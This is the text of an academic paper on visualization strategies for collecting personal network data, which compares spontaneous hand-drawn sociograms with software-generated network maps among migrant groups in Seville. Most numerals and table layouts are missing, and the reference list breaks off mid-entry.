delve deeper when trying to understand and interpret the data (moreno, ). participants tend to attempt spontaneously to justify or interpret why their sociogram looks like it does, providing an additional layer of information dur- ing the interview. in the context of migration, it allows researchers to decipher the temporal and spatial dy- namics of patterns of change (ryan and d’angelo, ). on the downside, respondents may also feel exposed, and this could create some tension during the interview (ryan et al., ). obtaining name interpreters with visualization techniques network visualization may also be used to gather data on name interpreters, which are aimed at pro- viding additional information on the alters listed. most researchers gather data on the network composition, collecting socio-demographic information, as well as evaluative data. again in this case, the use of visual- ization not only makes the data collection more in- teractive and hence, less burdensome, but also, if planned out adequately, it can effectively accelerate the recollection phase. in the context of mobility, re- searchers have shown particular interest in gathering evaluative data that could enable the interpretation of the network. for instance, regarding the alters of a mobile individual is relevant to know the place where they reside, the time they have spent in the location, the frequency of contact and the duration of the tie with ego, amongst other factors (cachia and maya jariego, ; domínguez and maya-jariego, ; lubbers et al., ; ryan and d’angelo, ). using visualization software to collect personal network data a variety of software packages has been developed to collect data on personal networks. on the one hand, programs designed as an extension of the pa- per name generator, through which a list of alters can be elicited from the interviewees (e.g. egonet); and, on the other hand, programs that collect data through a visual interface (such as egoweb, vennmaker and openeddi). programs with a visual interface provide an interactive tool, which gives a fun element to the data collection phase, as well as lowers respondent burden, typically associated with collection of per- sonal network data. however, they pose other issues that research- ers need to consider for collecting data efficiently. first, participants need to be technology conversant. second, the researcher needs to play a more active table . four visualization displays to gathering data of personal networks. display description advantages free hand spontaneous drawing respondents draw their network on a blank paper or a screen, with little instruction sometimes, other aides, such as post-it notes, figures or colored markers are used also applied in groups easy to prepare and set up. allows participants to be creative prompts qualitative discourse less prone to technical failure useful when language may be a problem concentric circles several concentric circles differing in size are used to guide the respondent in placing alters in different circles, around ego easy to set up and easy to use good summary of complex relations capture the psychological value of relationships adds structural data location maps respondents use real maps to depict movement within a given location or to identify significant places within a location maps are easy to use and respondents do not need much instruction on how to use them particularly useful for studies on mobility, migration, community behavior settings, etc name boxes consists of providing specific name boxes for respondents to list their alters enables respondents to list alters in a specific order grouping names into group categories is natural and intuitive for respondents connections role in the data gathering. unmotivated respondents might leave out some of the ties between alters, given they are not asked to evaluate each alter pair tie as in a typical adjacency matrix (mccarty and govindaramanujam, ). third, the data acquired is limited to a given template of the program used, while in free-hand drawings respondents are free to draw additional information. finally, interviewers need to consider whether to use a computer, laptop, tablet or mobile, as well as to take into account that in some areas, there is still limited access to internet connec- tion (eddens et al., ). a visual interface facilitates the depiction of com- plex structures, making them easily comprehensi- ble, helping both the respondent and the interviewer (gamper et al., ). its structured layout provides an integrated view of relations that would be hard to per- ceive just through narratives (in qualitative analysis) or tables (in quantitative analysis) (ryan and d’angelo, ). in the same vein, it provides a perspective, es- pecially in the context of interpersonal research, which cannot be gained otherwise (mccarty et al., ). moreover, visualizations are created in real-time, al- lowing participants to see their network, edit it and comment on it. different coding techniques yield a vast amount of data summarized within one image, also enabling interviewees to identify errors in their network. simply changing the shape of the nodes, for instance, using triangles for men and circles for women may allow respondents to detect information in their network, which they were not consciously aware about. finally, as any digital tool it permits easy storage, modification, reusability (gamper et al., ) and comparison with other networks. comparison of drawings and computer-based visualizations different studies have compared paper and computer- based visualizations. christopher mccarty et al. ( ) found that computer-based network visual- izations rendered important details that were differ- ent from respondents’ perceptions of what they had originally drawn, for example, allowing respondents to compartmentalize alters of different ethnicities. in a similar comparison used to investigate which tech- nique was most useful in identifying cliques, groups and communities, freehand visualizations were found to be simplistic in comparison to computer-based maps, but the paper-based method allowed respond- ents to be more creative in differentiating between different relations present in their network (cachia and maya jariego, ). similarly, hogan et al. ( ) found that the paper-based method was more visually compelling and allowed the respondents to see the network at once and to arrange the ties vis- ually easily using post-it notes. the most adequate method will depend on the objective of the study and the target population. for example, a highly skilled person is less likely to demonstrate reluctance to use an automated visual interface than someone who hardly knows how to use a computer, for whom the computer could already be creating a barrier that could negatively influence the interview. sometimes, the profession of the respond- ents also plays an important role as found by reyes ( ) in her study, whereby creative professionals showed a higher preference for free-hand drawing, as opposed to the use of an already pre-constructed design, such as concentric circles. consequently, the generation of data through vis- ualizations remains an area of research where more studies are needed to better understand how differ- ent approaches to data visualizations could lead to less bias in the data collected. as we have shown along this introduction, there is no one single meth- od of generating empirical data through visualiza- tions that does not yield its challenges, in terms of reliability, ease of use and time allocated for the data collection. network visualization is not a neutral tool, because like other instruments, it has its own bias and influence in how a personal network is visualized (ryan et al., ). moreover, the interviewer may also influence how a map is depicted (samuelsson et al., ), given an interview is also a dialog between the interviewer and interviewee. a major advantage of the visualization method remains participant satisfaction and removing burden from the respondents that in it- self could lead to potential problems with validity and reliability, especially when networks are too big and respondents purposely obliterate data, due to tired- ness and boredom (eddens and fagan, ). this study in this paper, we explore four contributions related to the use of network visualization in the context of data collection, based on our study on a group of high- ly skilled migrants living in spain (n = ). first, we explore a procedure in which network visualizations are integrated with traditional name generators. sec- ond, we examine the network visualization as a tool for qualitative interpretation for the participant dur- ing data collection. third, we compare how sponta- neous, hand-drawn sociograms differ to analytical visualizations elicited through visualization software packages. finally, we analyze different strategies on how respondents can use network visualizations to what the eye does not see: visualizations strategies for the data collection of personal network identify communities in networks. for each section, we draw on our research to explore and discuss the methodological opportunities and challenges in using network visualizations during the data collection and their potential use in the future. participants this research is based on data from foreigners re- siding in seville for a study that aimed at understand- ing how the type of mobility could influence the com- position and structure of personal networks (cachia and maya jariego, ). respondents belonged to four different foreign communities in seville: erasmus students (n = ); partners of a research institute, as part of the joint research centre of the european commission (n = ); japanese flamenco artists (n = ); and musicians from the royal symphonic or- chestra of seville (n = ). a high proportion of the respondents were female ( %) and the age of the respondents varied, with a majority belonging to the – age group ( %). the majority of respondents possessed post-graduate degrees ( %) or a degree ( %), for which we classified this population as high- ly skilled migrants, a population which has been less studied in the context of migration (ryan et al., ). interviews were conducted in english and lasted be- tween and minutes. methods and procedure data of this study was collected in two steps, using e-mail and face-to-face interviews. the first step of data collection consisted in a multiple name generator collected through a document sent by e-mail. in our study, participants were contacted prior to being sent the name generator and in most cases their names had been referred by friends through a snowball sam- pling. this helped in establishing a higher response rate. we ensured that participants were given clear instructions on how to complete the multiple name generator, with very precise instructions on how to fill the list of alters and an example to refer to should one get confused. the instructions were tested with five people of different nationalities for whom english was not the first language prior to starting the interviews and changes were made accordingly. upon receipt of the name generator document, the researcher would set up the interview. on average, data collection from the two modes was separated by a week. in the second phase, participants were invited to attend an interview, during which three network visualizations were completed. first, participants produced a freehand drawing of their network. second, using vennmaker (schönhuth et al., ), respondents represented the structure and com- position of their personal networks. finally, using the same software, in a third visualization they were asked to elicit alters’ attributes. vennmaker allows researchers to develop the personal networks with the respondents through visualization and to produce network data based on the visualization. it calculates basic network metrics and the network map can be exported as a matrix that could be imported in other programs, such as ucinet or visone. for this study, in the evaluation of the personal network, a fixed size of alters was selected. this network size incorporates the major sources of social support according to previous research, which has shown that alters strongly connected with ego tend to be few varying between – (wellman, ), with inner most layer of a network, known as sup- port clique averaging to five members and the next layer known as sympathy group oscillating between – members (dunbar and spoors, ; milardo, ; roberts et al., ). second, this is a network large enough for structural network analysis, based on previous findings (mccarty, ; maya-jariego, ). on the other hand, this is a network size which is feasible in time during the data collection, given we wanted to administer name interpreters for each alters. finally, the limit of was stablished to pro- duce a legible representation, reducing the cognitive load and the concentration required to remember all the visual cues and instructions. previous research has shown that when the number of alters is high, it becomes a challenge to visualize (ryan et al., ). these decisions were based on reaching an equilib- rium between data collection efficiency through the gathering of data in the least time possible (bidart and charbonneau, ), and data reliability, both in terms of composition and structure (mccarty, ). the names were elicited through a multiple name generator consisting of eight questions based on previous social support studies (barrera, ; burt, ; fischer, ; marin and hampton, ; van der poel, ; wellman, ; wellman and wortley, ). the eight questions corresponded to emotional support, instrumental support, social companionship, co-presence and other types of sup- port. given our interest in mobility, a specific name generator was added to identify which alters provoke travel from our respondents. the use of several name generators ensured that the research gathered data about a multidimensional definition of support, hence, obtaining a more accurate representation of the total social support network (marin and hampton, ; van der poel, ). single-name generator may be connections much faster, but might result in forgetting individuals who are significant but not easily remembered (bidart and charbonneau, ). as demonstrated by marin ( ), using different name generators may also be a way of avoiding association bias, whereby individuals only name persons who belong to the same group or belong to a similar activity. using visualizations in empirical network data collection integrating visualization with traditional name generators graphical representation of relationships can be used effectively in the collection of empirical network data. in this section, we will examine two different ways in which it can be carried out. on the one hand, vis- ualization is a device that can be used to generate names and relationships, either by itself or in combi- nation with traditional name generators. on the other hand, once we have a finished network, the visuali- zation enables the informant to interpret the personal network and give meaning to the resulting structure. generating names and relations through visualizations the traditional procedure to obtain a personal net- work usually consists of a name generator that pro- vides a list of names and the matrix of actors, com- pleted by the respondents. alternatively, it has been comparatively much less frequent to use visualization to obtain information about personal networks. in this case, the nodes and relationships are represent- ed progressively, as the data is collected, which re- inforces the process of collecting information. there are some computer programs, such as vennmaker or visone, that make it possible for researchers to start with a graphical input to develop a personal network, without the need to start from a previous data ad- jacency matrix. accordingly, these programs may be incorporated directly in an interview, or in a survey, that is, in the process of data collecting. in general, the graphic interface is attractive to the informant and facilitates the respondents in remembering informa- tion. moreover, it reduces fatigue and can be quite efficient. on the other hand, it is relatively more difficult to follow the same systematic and exhaustive collection of information that is typical of traditional name gen- erators, in which the relationship between each pair of actors is examined separately. therefore, it is im- portant that the researcher is aware that some infor- mation may be lost, or that the usual analytical proto- col is not completed. in our study with four immigrant groups in seville, respondents were provided with a variety of coding tools, given to them sequentially at different stages, so as to avoid confusion. the list of alters, which the respondents listed in the name generator was in- putted by the researcher in vennmaker and hence, during the interview, the respondents already had their list of alters displayed on the left-hand side of the program (see figure , left). ego was removed from the map, to avoid redundant information, given ego is connected to all alters. respondents were instructed to move alters freely from the column on the left of the map space and to place alters wherever they liked on the map space. once all alters were in the map space, a system- atic information collection procedure was followed, dyad after dyad, which was not considered finalized until questions about all the potential relations be- tween alters were asked. in our case, a relation was established if alters knew each other and would sa- lute each other in the absence of ego, as shown in figure . respondents were instructed to use a line between alters to indicate a relation between alters. during pretesting, we found that dividing the screen in four with a cross and suggesting respondents to start with relations of alters in the left bottom square and go clockwise, enabled participants not to get confused and forget any alter in the process. while this suggestion was voluntary, all the participants opt- ed to establish the relations using this order. through this visualization, we obtained the adjacency matrix of our respondents, given the program we used provide the possibility to export the data of the visualization into an adjacency matrix. in our study, we have observed that when using a software package for data collection, the pres- ence of the researcher is a way of assuring that the data collected is complete, avoiding problems relat- ed to structure and composition due to incomplete networks as suggested by mccarty and govindara- manujam ( ). during the data collection it is not uncommon for some participants to feel exposed sometimes even embarrassed or simply get tired, hence, it is important that the researcher steps in and helps with the network visualization. we have noticed that participants, especially those were less technolo- gy conversant, got tired quicker and were happy that the research could help with the visualization. during the network drawing on vennmaker, participants in- stinctively moved some alters around, in order, to be able to see the network better. vennmaker allows the what the eye does not see: visualizations strategies for the data collection of personal network movement of alters, without altering the relations with alters. this was interesting because it demonstrated how participants looked for solutions and were not taken aback by seeing their visualization on a laptop opposed to findings in previous research (hogan et al., ). giving meaning to visualizations of personal networks when a graphic representation of the personal net- work is shown to the participant, a conversation about the properties of the visualization naturally aris- es. spontaneously, participants are interested, some- times expressing surprise reactions to what they see. generally, it is easy to elicit interpretations that try to explain the resulting graph. the interviewees provide a context to understand the overall structure, the ex- isting groupings or the position of some individuals (alters). often, they resort to their biographical trajec- tory to give meaning to the composition or structural properties of the personal network. as shown in a previous study (maya jariego and holgado, ), on average informants tend to di- vide their personal network into four groups which often correspond to the family, a group of friends, co-workers (or student friends) and a fourth context of alternative interaction, for instance, friends from a swimming club. they also tend to highlight around three key actors – who may be a partner, parents or a close friend – usually characterized by their significant connection to several of the groups identified in the personal network. when describing the visualization, attention is nor- mally focused on the central space and then moved to the periphery. the interpretation focuses on those individuals who seem to have a more prominent role in terms of centrality, or who connect several subsets in the network. in addition, respondents frequently re- sort to the identification of social groups, organizing their interpersonal space according to the usual inter- action contexts. we have summarized the qualitative description strategies of personal networks in table . visualizations provide the possibility to code the data in a way that is easy for both the participant and the researcher to understand the data. as can be observed in figure (right), which corresponds to an orchestra musician, a great deal of information can be depicted in one visualization. in this graph, we have used the color of the nodes to indicate the nationality of the nodes, the size of the nodes to indicate the duration of the tie and the map space to depict the location of alters mentioned. the graph suggests a respondent who is well settled in seville, with a great proportion of important ties being spanish, who also reside in seville. the size of the nodes indicate that the respondent has possibly lived for a long time in seville, given the respondent has known a high pro- portion of the local alters for more than years. as typical in most immigrant networks, in the country figure : two visualizations presented to respondents. left: basic network diagram before geographical classification of alters. this graphic was elaborated during the interview, in interaction with the interviewee. right: personal network of a musician of the royal symphony orchestra of seville. colors represent nationalities of alters: red, spanish nationality; blue, same nationality as the respondent; green, other nationalities. three areas distinguish the location of residence of alters: seville (spain), home country, other locations. the size of the node represents the duration of the tie, the bigger the node the longer the respondent knew alter. connections of origin, alters are of the same nationality of the respondent. the nodes in the third location typically indicate previous movement of the ego, however, in this case, given alters are spanish and of the same nationality of the ego, their position may suggest that it is alters who have moved to another location. the interview with the respondent was an opportunity to check that all this information was correct, as well as confirming the hypothesis that researchers derived from its interpretation. in our study, the first graphical representation of the network provided a good base for discussion. in general, respondents were pleasantly surprised to see their network and often, commented spontane- ously without any prompting on the structure of their network. primarily, respondents often discussed the groupings of their network; as well as, identifying the groups and what type of relation they represented, as for instance, these are my friends from primary school, or these are family members who have moved to another country. typically, respondents also dis- cussed alters who are central in their network in terms of connections, which instinctively were often de- picted in the center of the network space, as can be seen in figure (left). at the same time, most of the respondents would describe isolates in the network, such as node in figure (left). we sensed that typ- ically respondents wanted to give an explanation why these nodes were so isolated in their network. we also used a second map, which facilitated information on the geographical distribution of the respondents’ contacts. in this case, the relations covered a transnational space, between the coun- try of origin and the receiving country (and some- times even with a third geographical space, when the individual has previous itinerant trajectory). it is usual that the “there” and the “here” appear in the qualitative description of the graphic representation. this configuration introduces a greater fragmentation in personal networks (maya-jariego and armitage, ), very evident for example in the case of eras- mus students, with a short stay at destination. it also entails that the informants explain the changes that their personal network has experienced from a func- tional point of view. for example, it is typical that a group of strong ties are in the country of origin, while the rest (with whom now there are no opportunities for daily interaction) have passed into a latent state. on the other hand, the greater relative presence of weak ties in the new space of sociability (in this case, seville) may depend on the length of stay and the type of mobility undertaken by the individual (cachia and maya jariego, ). previous mobility will also result into a more fragmented personal network, given al- ters may be more dispersed than if the respondents have only lived in one foreign location. respondents with more dispersed networks, very frequent among the itinerant workers of the european commission, were surprised that a good proportion of their social support network were living in other locations and immediately, tried to explain why their network was so fragmented. this visualization prompted discus- sion on how respondents receive social support from distance alters, whereby respondents discussed how they connected with these alters through media com- munications or periodic visits and how living in differ- ent location has led to a higher dispersion of alters. as we have already indicated, the visualization of the data following a core-periphery scheme is intuitive for the informants. the interpretation is usually guid- ed by the layout of subsets that corresponds to the most significant social contexts in which the individu- al participates. in addition, special attention is paid to alters that are more significant from a personal point table . qualitative description of personal networks. strategies description implications concentric circles comments are organized in segments of relative importance, from the inside out center-periphery logic relative importance of individuals the role of alters with greater centrality and intermediation stands out strong ties brokers groups subsets of alternatively densely connected are identified social circles contexts of interaction communities of belonging isolates an explanation is often given to explain why certain nodes are isolated accessibility to alternative social circles what the eye does not see: visualizations strategies for the data collection of personal network of view, either because you have a more intense re- lationship with them, spend more time with them, or are providers of multiple types of social support. what is in a graph? contributions of a systematic and analytical approach one conclusion that we can derive from the previous analysis is that the way the data are presented vis- ually is not inconsequential, since it can potentially affect the perception of the respondents or the type of comments and interpretations prompted from the graph. next, we explore the value added by the an- alytical representation of networks when compared with other strategies individuals follow to spontane- ously describe their network. finally, this will allow us to highlight the value of network analysis visualization in identifying underlying structures that are not natu- rally evident to individuals. comparison of spontaneous hand-drawn visualizations with the analytical rep- resentation of the personal network to have an element of comparison, in our study we asked the participants to make a visual representation of their relationships. this request was left open, so as to allow spontaneous drawings and, thus, avoid- ing inducing a specific layout. for the same reason, the word “network” was intentionally omitted from the instructions. the result indicates to a certain extent how egos perceive their networks. the representations of the social relations of each individual obtained were highly varied. in table , we summarize the eight most frequent drawings. most respondents opted to represent their social relations through the use of groups with whom a frequent re- lationship is maintained. specifically, the classification into social groupings appears in almost two-thirds of the analyzed drawings (n = , . %). in some cas- es, the groups in which the individual participates are listed directly, while in others the subsets are drawn from the lists of names or nodes that have been pre- viously represented. the most frequent combinations are to identify groups from a list of names (n = , . %) or from the ego’s tree of relationships (n = , . %), sometimes in the form of a star network. al- though less common, there are some cases in which a graph with nodes and relationships is segmented into subgroups after its completion (n = , . %). two other common strategies were the elaboration of lists of names (n = , . %) or the drawing of a star network around ego (n = , . %). in both cases, the main strategy consists in reducing the interpersonal environment to the contacts available to the individual. however, the drawing of a relationship tree (or a star network) around the respondent usually entails, even if only partially, a close resemblance to the structure of relations around the respondent. for example, when drawing a star network around ego, some respond- ents place the most important relationships closer to ego, or point to indirect relationships that emerge from contacts in the first order zone of ego. only a small number of respondents drew (partial- ly) graphs (n = , . %), composed of a set of nodes and their relations to each other. such graphs are usually incomplete, because even though relations are drawn between alters, they are not done exhaustively. finally, concentric circles, as a way to organize the visualizations according to the relative importance of alters, hierarchical classification diagrams or group- ings depending on the geographical location of alters were also used. in figure , we have selected six examples of graphic representations, to illustrate the combination of the strategies above. the classification into groups, either by the stacking of nodes (i.e. names) or by the use of social categories, is combined with all kinds of visualizations. the most common is to classify al- ters according to the type of relationship (for exam- ple, family, friends and neighbors), or depending on the interaction contexts (for example, “the group with whom i cycle”). we have observed that for the partic- ipants in our study, it is far much easier to represent their personal network in terms of social categories, as opposed to an analytical visualization of relation- ships. also, the networks correspond to partial rep- resentations (such as a star network, node segments according to their relative importance or, at the sim- plest end, a list of names), rather than a complete graph, given the latter requires an exhaustive compi- lation of nodes and their relationships with each other. in this study, we found no evidence that the type of spontaneous visualization is related to the struc- tural properties of the personal network. however, in some cases we observed certain parallelism be- tween the respondent’s drawing on the blank page and the subsequent interactive representation with vennmaker. for example, an erasmus student of ger- man origin distributed his personal contacts between two differentiated socio-geographical spaces, rep- resenting the country of origin and the city of seville (as we can see in figure , left). this same scheme was repeated in the graph that was generated in vennmaker with the help of the interviewee (figure , center). possibly, the cognitive representation that an individual has of his personal network – although it connections is a global perception, without attention to detail – , conditions the way in which information is stored and recovered from memory. therefore, it can influence in some way the collection of relational data. it is precisely the collection of systematic and ex- haustive information that allows us to capture rela- tional patterns that are not intuitively perceived by the interviewees, generating novel structural information even for them. some participants resorted to artistic representa- tions. for example, an erasmus student drew a tree, whereby the central trunk containing the core alters sustains the branches that have emerged through her biographical itinerary (figure , left). in another case, a flamenco artist distinguishes between the closest strong relationships that she meets frequently and alters distributed in the different geographical locations in which she has resided (figure , right). in comparison with these graphs, the analytical visualization is not based on the symbolic value of the representation. however, what is lost in imagery is gained in structure: revealing the underlying struc- ture can have a similar effect, giving the observer a deep insight, the feeling of being able to observe and apprehend the whole picture. identifying groups and communities through personal networks in a previous study (cachia and maya jariego, ), which served as a pretest of the instruments we used in the present investigation, we verified that the visualization of personal networks facilitates the de- tection of social groups and communities in which respondents participates. specifically, we compared the spontaneous enumeration of significant groups table . common visualization strategies used in the spontaneous representation of the personal network. strategy n % description groups . the respondent draws a line or a circle in which he/she groups a subset of people belonging to the same category (e.g. “housemates,” “family,” “friends from work,” “flamenco colleagues,” etc.) list of names . the interpersonal environment is summarized through a list of contacts. names tend to be elicited through association and it is common that contacts with a similar relationship (e.g. siblings) have a close position to each other in the drawing ego’s star or ego’s tree . it consists of representing ego in the center of the graph and drawing around his direct contacts. links between alters are rare, if there are any. we have called “relationships tree” those cases in which, from the direct relationship with ego, other branches of indirect relationships emerge nodes and relationships . a graph is drawn, composed of a set of individual nodes and the relationships they maintain between them concentric circles . the most important relationships are drawn in the center of the graph and around them concentric circles of decreasing relative importance are shown successively artistic representation . in some cases, respondents opted for creative drawings to represent metaphorically the characteristics of the personal network geographical position . some respondents draw the distribution of their contacts according to the geographical location of alters. for instance, in our study, given it is based on a sample of people who have changed their place of residence, alters were placed between the home country and the host country diagram or organization chart . a schema is represented that organizes the personal contacts following some system of hierarchical classification, or imitating the structure of an organizational chart note: in each strategy, we indicate the number and percentage of respondents who used this form of graphic rep- resentation. the same respondent can use several visualization strategies in the same graph. what the eye does not see: visualizations strategies for the data collection of personal network and communities by the respondent with the iden- tification of groups and communities based on the visualization of their personal network. we found that the participants identified times more communities and . more groups from the analytical visualizations than from the spontaneous drawing. therefore, a more exhaustive evaluation of the per- sonal network not only reflects its structure in greater detail, but also allows researchers to capture uncon- scious structural properties, that is, those that the in- dividual would be unable to describe spontaneously and intuitively. returning to the study with the four im- migrant collectives in seville, it can be easier for the respondents to explain how their relations are distrib- uted in the transnational space by placing the nodes in the different areas that represent the place of habit- figure : six examples of hand-drawn visualization of personal networks. (a) the respondent has listed names in groups (family, neighbors, etc.). (b) the representation is a star network of ego, in which groups of names have been connected instead of individual nodes. (c) it is a symbolic representation, in which the individual has classified her contacts in three categories. (d) the sun represents the strongest and most significant ties for the respondent, whose light nourishes other relationships that have developed in holland (the tulips) and in spain (the daisy flowers). (e) the spiral allows the recognition of three segments of alters, depending on their proximity to ego, which correspond to three levels of relative importance. (f) a network of relationships between individual nodes is divided in ten different groups. list of names, with classification in groups. ego's star network, with classification in groups. artistic representation, with classification in groups. artistic representation, with classification in groups and geographical position. concentric circles, in three segments of relative importance. graph (nodes and relationships), with classification in groups. a b c d e f figure : spontaneous visualization and graphic representations with vennmaker and ucinet of the personal network of an erasmus student. connections ual residence of the alters. however, the systematic, analytical and exhaustive collection of relationships not only reduces social desirability but also reveals novel processes for the informants themselves. in- deed, the analytical visualization contributes to the understanding of social structures, notwithstanding that its application as a technique consumes a great deal of time and effort. in this study, we have refrained from asking respondents to enumerate the groups and communities in their visualizations and what we have noted is that intuitively respondents tried to represent alters in different groups. interestingly, this was more visible in the hand-drawn visualizations. respondents used various techniques to group peo- ple together, varying from drawing people together in one space, using squares and lists and using cir- cles, amongst others. a major advantage of using a blank paper for visualizations is that respondents are free to represent their networks as they like, without any restriction. in this respect, this type of visualiza- tion seems to correspond better to how respondents perceive their networks and the structural features of the network are simplified. the richness of the structural data of the automated visualizations was a novel aspect in re- spondents’ network. many were pleasantly surprised to see their automated visualization prompting them to comment on different aspects of the relations. for instance, they would comment that they were not aware that a particular group in their network was so closely-knit or that some alters hardly knew any- one in their network. there were instances, were the detection of groups became clearly visible when the relations were added to the network (see figure ). if we look at the two visualizations, we observe how in the automated visualization (on the right), four groups clearly emerge from the visualization, some- thing which was not easily detectable in the sponta- neous drawing. moreover, the respondent could also observe how one of the groups is very densely con- nected, a characteristic which is not visible at all in the free-hand drawing. figure : symbolic representations of the personal network. figure : spontaneous drawing and the automated visualization by an erasmus student. what the eye does not see: visualizations strategies for the data collection of personal network it was also interesting to observe that the transnational dimension was often depicted in a great variety of the networks. the transnational spaces can be easily identifiable in the way the network is drawn or constructed. in this respect, we have often observed similarities in terms of network structure in the way networks are drawn and the automated ver- sion. the major difference between the two types of visualizations lies in the relations. in the spontaneous drawing, respondents tend to simplify the connec- tions, using various techniques. in this respect, in this study we have observed that while some structural features of the network are of- ten visible in the hand-drawn visualization, the global structure of the network remains concealed and only becomes visible through an automated visualization. in figure , we can note how the automated visual- ization (right) illustrates a highly dense group, which would have not been detected through the sponta- neous drawing. in contrast, the clear division of the groups is more visible in the hand-drawn visualiza- tions. the analytical representation helps to become aware of the general structural properties. discussion in this paper, we have shown two ways how to use network visualization in data collection. on the one hand, as a generator of names and relationships, the graphic representation acts as a facilitator that reduc- es the perceived load in the information collection process. on the other hand, as a device for request- ing qualitative interpretations, visualization allows ob- taining biographical information and the identification of natural interaction contexts. in both cases, it works efficiently in the description of transnational spaces and organizing relationships by socio-geographical areas. as found by ryan and d’angelo ( ) when using sociograms in their longitudinal research on mi- grants, visualizations prompted respondents to dis- cuss issues related to identity and their changing self through time, instead of simply checking how many ties have changed or remained. the advantages of using computer-based net- work visualization in the data collection are numer- ous. a depiction of complex structures is easily made comprehensible, helping both respondent and inter- viewer (gamper et al., ). through digital network visualizations it is much easier for the interviewee to identify errors in their network. these advantages are confirmed when compared to the spontaneous representations of the personal network (mccarty et al., ). computer-based network visualizations rendered important details that were different from respondents’ perceptions of what they had originally drawn, for example, allowing respondents to com- partmentalize alters of different ethnicities. however, visualization strategies have some limi- tations in the systematic collection of information of the dyad relations. while name generators with a ma- trix of alters force the interviewee to be disciplined in the evaluation of the dyads one by one, with graphic devices there is a tendency to focus on the overall vision of the relationships. we have seen this when comparing hand drawings of personal networks with the elaboration of traditional graphs. this is consist- ent with the value attributed to the technique of name generators when a valid and reliable measure of the size of an individual’s personal network is sought (hogan et al., ). figure : spontaneous drawing and the automated visualization by a partner of a worker of the european commission. connections in the spontaneous representation (through free- hand drawing), participants frequently resort to the identification of social groups (which sometimes reflect the main contexts of interaction in which the individu- al participates, or significant subsets of their personal network, for example in function of the type of rela- tionship). in our case study, referring to the transna- tional space, the groups are usually organized in two or more geographical areas. some drawings also rec- ognize partial approaches to a network, either with a list of names, with a graph in the form of a star around ego, or with nodes and relations drawn in a non-sys- tematic way. the preference for the use of group cate- gories had previously been observed with samples of university students and immigrants (maya jariego and holgado, ; mccarty et al., ). in the context of transnational mobility, becoming aware and under- standing the structure of the social support network may be highly significant and is clearly associated with psychological adaptation during relocation. in contrast, analytical visualizations generate a more detailed representation, which reveals structural patterns that are not intuitively evident to the partici- pants. that is, it serves to identify unconscious rela- tional phenomena, such as belonging to communities or participation in social circles. this highlights the beneficial use of network analysis in the study of the psychological sense of community, social cohesion and community integration processes (maya-jariego, ). in our study, it was interesting to verify that the groups with which the individual has a direct relation- ship (which are usually represented in the personal network), are an efficient means to detect the commu- nities of indirect relationships of which they are a part. resorting to visualization during data collection has great advantages in terms of reducing partici- pant burden and time. on the other hand, the ver- satile nature of visualizations provides an enormous potential to integrate it with the objectives of each specific investigation. it is a strategy that seems to coincide with the mechanisms of perception of the social world (brands and mehra, ; mehra et al., ): for participants it is natural to represent their relationships on a map or “read“ the graphic rep- resentation of their personal network. in addition, it allows them to concentrate on the fundamental properties of their interpersonal space, considering the entire configuration (which entails certain degree of simplification). in some cases, “gestalt” has been identified as a subjective approach followed by indi- viduals in the description of their networks (von der lippe and gamper, ). this shows that complet- ing a matrix in a traditional name generator requires a different type of cognitive processing from the visual representation of relationships during the interview process. the analytical approach is less intuitive and more expensive, both for the interviewer and for the interviewee. however, within this limitation lies its vir- tue, since the unconscious ways of obtaining ties and relationships not only reduce the social desirability of the information obtained but also may eventually gen- erate structures that are a surprise even for inform- ants. the analytical approach sometimes makes visi- ble what the eye does not see. conclusions in this paper we have reviewed different strategies of visual representation of the networks, together with the contributions and limitations that each of them en- tails. the visualization can be based on a spontaneous drawing, without restrictions; in a computer-assisted interactive interview, or in analytical data collection through a name generator and an adjacency matrix. each approach has its advantages and disadvantages. depending on the objective of the study, the researcher should choose what type of visualization to use, keep- ing in mind, that the type of visualization could mean obliterating some data. for instance, in this study we have shown that an automated visualization is a better tool if the researcher is interested in the global structur- al features of the network. on the other hand, a hand- drawn visualization would be more apt if the researcher is trying to understand how interviewees perceive their network, given the unstructured approach allows them to depict their network freely, without any template of automated visualizations. in fact, the combination of strategies can help to counteract some of the limita- tions and generate new types of data. through the study of the transnational relations of four groups of foreigners living in seville, we have verified the natural tendency to simplify the social world in social categories (referred to as groups of belonging), as well as the specific value of analytical displays, which allow to go beyond the cognitive ca- pacity of the individual on his space of relations: • the description of interpersonal space through social groups is an intuitive strategy, which the respondents use both when they draw their personal network spontaneously and when they are asked to give meaning to a socio- gram. the categories are a central element in the processes of social perception. • however, analytical graphs detect structural patterns that are not intuitively evident, facilitat- ing the description of social circles and com- munities of belonging. what the eye does not see: visualizations strategies for the data collection of personal network references agneessens, f., waege, h. and lievens, j. ( ). social support typologies: different approaches for reducing social support data. developments in social science methodology, : – . antonucci, t. ( ). hierarchical mapping technique: measuring social support networks. gener- ations, ( ): – . barrera, m. ( ). a method for the assessment of social support networks in community survey re- search. connections, ( ): – . bastian, m., heymann, s. and jacomy, m. ( ). gephi: an open source software for exploring and ma- nipulating networks. paper presented at the internation- al conference on web and social media, available at: https://gephi.org/publications/gephi-bastian-feb .pdf san jose, california, may – , . published by the aaai press, menlo park, california. bidart, c. and charbonneau, j. ( ). how to gen- erate personal networks: issues and tools for a socio- logical perspective. field methods, ( ): – . brands, r. a. and mehra, a. ( ). gender, bro- kerage, and performance: a construal approach. academy of management journal, ( ): – . burt, r. s. ( ). network items and the general social survey. social networks, ( ): – . cachia, r. and maya jariego, i. ( ). eliciting communities from personal network visualisations: ties, groups and communities . paper presented at in- ternational network for social network analysis: sun- belt xxx., trento. cachia, r. and maya-jariego, i. ( ). mobility types, transnational ties and personal networks in four highly skilled immigrant communities in seville (spain). social networks, : – . carrasco, j. a., hogan, b., wellman, b. and miller, e. j. ( ). collecting social network data to study so- cial activity-travel behaviour: an egocentric approach. paper presented at the th transportation research board meeting, washington, dc. cheong, l., armour, c. and bosnic-anticevich, s. ( ). primary health care teams and the patient per- spective: a social network analysis. research in social and administrative pharmacy, ( ): – . den besten, o. ( ). local belonging and ‘geog- raphies of emotions’: immigrant children’s experience of their neighbourhoods in paris and berlin. childhood, ( ): – . domínguez, s. and maya-jariego, i. ( ). acculturation of host individuals: immigrants and personal networks. american journal of community psychology, ( ): – . dunbar, r. i. m. and spoors, m. ( ). social net- works, support cliques, and kinship. human nature, ( ): – . eddens, k. and fagan, j. m. ( ). comparing nascent approaches for gathering alter-tie data for egocentric studies. social networks, : – . eddens, k., fagan, j. m. and collins, t. ( ). an interactive, mobile-based tool for personal social network data collection and visualization among a geographically isolated and socioeconomically disad- vantaged population: early-stage feasibility study with qualitative user feedback. jmir research protocols, ( ): e . fischer, c. 